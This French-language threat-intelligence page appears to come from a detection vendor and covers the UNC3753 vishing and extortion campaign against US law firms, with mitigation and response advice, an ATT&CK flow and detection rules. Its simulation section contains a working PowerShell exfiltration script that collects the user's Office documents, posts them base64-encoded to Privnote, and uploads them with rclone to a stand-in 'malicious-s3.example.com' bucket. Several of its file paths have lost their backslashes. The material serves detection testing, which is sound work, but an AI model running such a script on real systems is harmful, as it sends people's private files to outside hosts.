À la recherche de conseils : attaques ciblées en cours contre des cabinets d’avocats américains
Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Un groupe de menace financièrement motivé, suivi sous le nom UNC3753, mène des campagnes de vishing qui trompent les victimes pour qu’elles installent des logiciels de surveillance et de gestion à distance. Une fois l’accès établi, les acteurs volent des informations juridiques et financières sensibles, puis font chanter l’organisation victime en menaçant de les rendre publiques. La campagne se concentre sur les entreprises de services professionnels aux États-Unis, en particulier les cabinets d’avocats, et peut impliquer à la fois le vol de données cybernétiques et physiques.
Enquête
Mandiant a observé le cycle d’intrusion complet, de l’appel initial d’hameçonnage vocal jusqu’au vol de données et au chantage, parfois en une seule journée ouvrable. Les victimes ont été convaincues d’utiliser des outils de partage d’écran et des logiciels de gestion à distance tels que AnyDesk, Bomgar ou un installateur personnalisé SuperOps livré avec une commande curl. L’exfiltration des données a été effectuée à l’aide d’outils tels que WinSCP, Rclone ou des téléchargements directs vers des comptes de stockage en nuage grand public.
Atténuation
Les organisations devraient former le personnel à reconnaître les tentatives de vishing, appliquer des procédures de vérification strictes pour toute demande d’assistance à distance et bloquer les outils de gestion et de partage d’écran à distance non autorisés. Désactiver les médias amovibles, surveiller les transferts sortants inhabituels vers des destinations de stockage en nuage ou FTP, appliquer des contrôles d’accès conditionnels aux environnements VDI, et imposer une authentification multifactorielle sur les dépôts de documents critiques peuvent réduire davantage les risques.
Réponse
Si cette activité est détectée, isolez immédiatement le point d’accès concerné, terminez toute session à distance non autorisée et supprimez les binaires de gestion à distance installés. Les enquêteurs devraient collecter l’historique des lignes de commande, les modifications du registre et les artefacts des tâches planifiées pour un examen médico-légal. Les identifiants compromis doivent être réinitialisés, l’exfiltration de données doit être évaluée, et l’engagement des forces de l’ordre doit être envisagé si le chantage a commencé.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Node definitions initial_access["<b>Action</b> – <b>T1566.004 Phishing : Spearphishing Vocal</b><br/><b>Description</b> : L’attaquant utilise un appel vocal convaincant pour tromper la cible en fournissant des identifiants ou en exécutant des commandes malveillantes."] class initial_access action user_execution["<b>Action</b> – <b>T1204.002 Fichier Malveillant</b><br/><b>Outil</b> : cURL + installateur MSI<br/><b>Description</b> : La victime exécute un fichier MSI malveillant téléchargé via cURL, entraînant l’exécution de code sur le système."] class user_execution action remote_desktop["<b>Action</b> – <b>T1219.002 Logiciel de Bureau à Distance</b><br/><b>Outils</b> : Zoom, Microsoft Teams, AnyDesk<br/><b>Description</b> : Les applications légitimes de bureau à distance ou de réunion sont abusées pour maintenir un accès distant persistant."] class remote_desktop action discovery["<b>Action</b> – <b>T1083 Découverte de Fichiers et Répertoires</b> & <b>T1680 Découverte de Stockage Local</b><br/><b>Description</b> : L’adversaire énumère les fichiers, répertoires et emplacements de stockage locaux pour localiser les données précieuses à exfiltrer."] class discovery action data_staging["<b>Action</b> – <b>T1074 Mise en Scène des Données</b> & <b>T1560 Archivage des Données Collectées</b><br/><b>Description</b> : Les fichiers collectés sont mis en scène localement et compressés dans des archives pour préparer l’exfiltration."] class data_staging action exfiltration["<b>Action</b> – <b>T1567.002 Exfiltration vers Stockage en Nuage</b> & <b>T1020 Exfiltration Automatisée</b><br/><b>Cible</b> : Google Drive<br/><b>Description</b> : Téléchargement automatisé des archives mises en scène vers un service de stockage en nuage pour extraction à distance."] class exfiltration action physical_media["<b>Action</b> – <b>T1052 Exfiltration sur Support Physique</b><br/><b>Description</b> : Transfert de données sur des médias amovibles pour une exfiltration hors ligne lorsque les canaux réseau sont restreints."] class physical_media action cleanup["<b>Action</b> – <b>T1070.001 Effacer les Journaux d’Événements Windows</b><br/><b>Description</b> : Suppression des journaux d’événement Windows pour effacer les preuves de l’intrusion."] class cleanup action %% Edge connections initial_access –>|leads_to| user_execution user_execution –>|enables| remote_desktop remote_desktop –>|enables| discovery discovery –>|leads_to| data_staging data_staging –>|enables| exfiltration exfiltration –>|leads_to| physical_media physical_media –>|followed_by| cleanup "
Flow d’Attaque
Détections
Logiciel de Gestion / Accès à Distance Alternatif (via création_de_processus)
Afficher
Utilisation Suspecte de CURL (via cmdline)
Afficher
Tentative Possible d’Installation de SuperOps RMM (via événement_fichier)
Afficher
Logiciel de Gestion / Accès à Distance Alternatif (via système)
Afficher
Logiciel de Gestion / Accès à Distance Alternatif (via audit)
Afficher
Tentative Possible d’Installation de Logiciel RMM Utilisant MsiInstaller (via journaux d’application)
Afficher
IOC (SourceIP) pour détecter : En Quête de Conseil : Campagne Ciblée en Cours Contre les Cabinets d’Avocats Américains
Afficher
IOC (DestinationIP) pour détecter : En Quête de Conseil : Campagne Ciblée en Cours Contre les Cabinets d’Avocats Américains
Afficher
Détection de Partage de Fichiers Non Autorisé et de Trafic SSH Volumineux [Pare-feu]
Afficher
Exfiltration de Données UNC3753 Utilisant Privnote et des Outils de Transfert de Fichiers [Connexion Réseau Windows]
Afficher
Accès à Distance UNC3753 et Installation de MSI Malveillant [Création de Processus Windows]
Afficher
Exécution de Simulation
Condition Préalable : La Vérification Préliminaire de Télémétrie & Base de Référence doit avoir réussi.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Les exemples abstraits ou non liés entraîneront un diagnostic erroné.
-
Narratif de l’Attaque & Commandes :
-
Reconnaissance & Préparation des Données (T1005, T1083) :
L’adversaire répertorie les répertoires d’utilisateurs et copie tous les*.docxand*.xlsxfichiers dans un dossier de mise en scèneC:TempStagedData. -
Téléchargement via Privnote (T1567.002) :
Utilisant PowerShell, l’attaquant lit chaque fichier, encode le contenu en base‑64, et le poste surhttps://privnote.com/api/note. La ligne de commande inclut l’URL, ce qui satisfait lacondition_selection_privnote. -
Transfert avec Rclone (T1020) :
L’attaquant exécuterclone.exe(téléchargé à la volée) pour pousser les fichiers mis en scène vers un seau S3 malveillant. Le nom du processus “rclone.exe” correspond àcondition_outil. -
Nettoyage : Supprimer le dossier de mise en scène et tous les binaires résiduels.
-
-
Script de Test de Régression : (PowerShell – autonome, pas de dépendances externes au-delà de
Invoke-WebRequest.)# ------------------------------------------------- # Simulation d'Exfiltration UNC3753 – PowerShell # ------------------------------------------------- # 1. Préparez le répertoire de mise en scène $staging = "$env:USERPROFILETempStagedData" New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. Copiez des données d'échantillon (simulez la collecte de données) Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Téléchargez chaque fichier sur Privnote (exfiltration via service web) $privnoteUrl = "https://privnote.com/api/note" Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # L'URL apparaît dans la ligne de commande -> déclenche condition_selection_privnote Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Téléchargez Rclone (si non présent) et exfiltrez via S3 $rcloneExe = "$env:TEMPrclone.exe" if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip" Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force } # Configure un seau S3 distant (malveillant) – la config est écrite dans un fichier temporaire $rcloneConfig = @" [malicious type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com "@ $configPath = "$env:TEMPrclone.conf" $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # Exécutez rclone copy – le nom du processus "rclone.exe" déclenche condition_outil & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO # 5. Nettoyez Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath -
Commandes de Nettoyage :
# Terminez tous les processus résiduels de WinSCP ou Rclone Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # Supprimez les fichiers temporaires laissés derrière (le cas échéant) Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue